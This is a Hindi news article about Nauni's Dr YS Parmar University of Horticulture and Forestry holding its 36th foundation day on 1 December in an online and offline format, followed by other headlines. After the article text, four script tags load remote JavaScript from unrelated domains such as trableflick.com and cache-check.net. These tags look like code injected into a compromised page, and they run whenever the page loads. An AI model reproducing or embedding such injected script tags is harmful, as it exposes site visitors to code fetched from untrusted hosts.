<p>डॉ यशवंत सिंह परमार औद्यानिकी और वानिकी विश्वविद्यालय, नौणी, 1 दिसंबर को अपना 36वां स्थापना दिवस मनाएगा। हिमाचल प्रदेश के माननीय राज्यपाल और विश्वविद्यालय के कुलाधिपति श्री बंडारू दत्तात्रेय इस समारोह की अध्यक्षता करेंगे जबकि हिमाचल प्रदेश के मुख्यमंत्री जयराम ठाकुर मुख्य अतिथि होंगे। हिमाचल प्रदेश सरकार के बागवानी मंत्री महेंद्र सिंह ठाकुर, कृषि मंत्री वीरेंदर कंवर,स्वास्थ्य और परिवार कल्याण मंत्री डॉ राजीव सैजल और वन मंत्री राकेश पठानिया जी विशिष्ट अतिथि होंगे।</p>
<p><img src=”/media/gallery/images/image(1661).png” style=”height:110px; width:900px” /></p>
<p>कोविड़ 19 के कारण इस वर्ष, इस कार्यक्रम को ऑनलाइन और ऑफलाइन माध्यम से किया जाएगा। कार्यक्रम अध्यक्ष, मुख्य अतिथि और विशिष्ट अतिथि समारोह में ऑनलाइन जुड़ेंगे। विश्वविद्यालय के मुख्य परिसर और राज्य के विभिन्न हिस्सों में स्थित विभिन्न अनुसंधान केंद्रों और कृषि विज्ञान केंद्रों में ऑनलाइन और ऑफलाइन मोड में समारोह आयोजित किया जाएगा हैं। समारोह के दौरान प्रदेश के प्रगतिशील किसानों और विश्वविद्यालय के मेधावी छात्रों को सम्मानित किया जाएगा। विश्वविद्यालय के प्रकाशनों का विमोचन भी कार्यक्रम में किया जाएगा। पिछले एक वर्ष में विश्वविद्यालय की विभिन्न उपलब्धियों की प्रगति रिपोर्ट भी प्रस्तुत की जाएगी। इस कार्यक्रम का लाइव स्ट्रीमिंगविश्वविद्याल के फ़ेसबूक और यूट्यूब चैनल पर किया जाएगा।</p>
<p>औपचारिक रूप से तो विवि की स्थापना 1 दिसम्बर,1985 में हुई लेकिन विश्वविद्यालय का अस्तित्व सोलन के कृषि कॉलेज से जुड़ा है जो वर्ष 1962 में शुरू हुआ था। स्थापना के बाद से ही नौणी विश्वविद्यालय का शिक्षा,शोध और विस्तार में उत्कृष्टता का लंबा इतिहास रहा है। विश्वविद्यालय के छात्रों,वैज्ञानिकों और कर्मचारियों के संयुक्त प्रयासों से औद्यानिकी और वानिकी के क्षेत्र में हिमाचल प्रदेश का नाम रोशन हुआ है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1606705224824″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
Shimla: मुख्यमंत्री सुखविंद्र सिंह सुक्खू की तबीयत फिर बिगड़ी है। मंगलवार रात को उपचार करवाने…
शिमला: चौधरी सरवण कुमार एग्रीकल्चर यूनिवर्सिटी पालमपुर की 112 हेक्टेयर लैंड को पर्यटन विभाग…
UNA: जिला कारागार बनगढ़ से उपचार के लिए क्षेत्रीय अस्पताल लाया गया विचाराधीन कैदी…
Chennai, Agencies: किरण राव की ‘लापता लेडीज’ को ऑस्कर पुरस्कार 2025 के लिए भारत…
Hamirpur: प्रदेश में किसानों को 50 प्रतिशत सब्सिडी पर साइकल-हल प्रदान किए जाएंगे। 2200…
Shimla: 6 छात्र नेताओं के निष्कासन का मामला तूल पकड़ गया है। तनाव बढ़…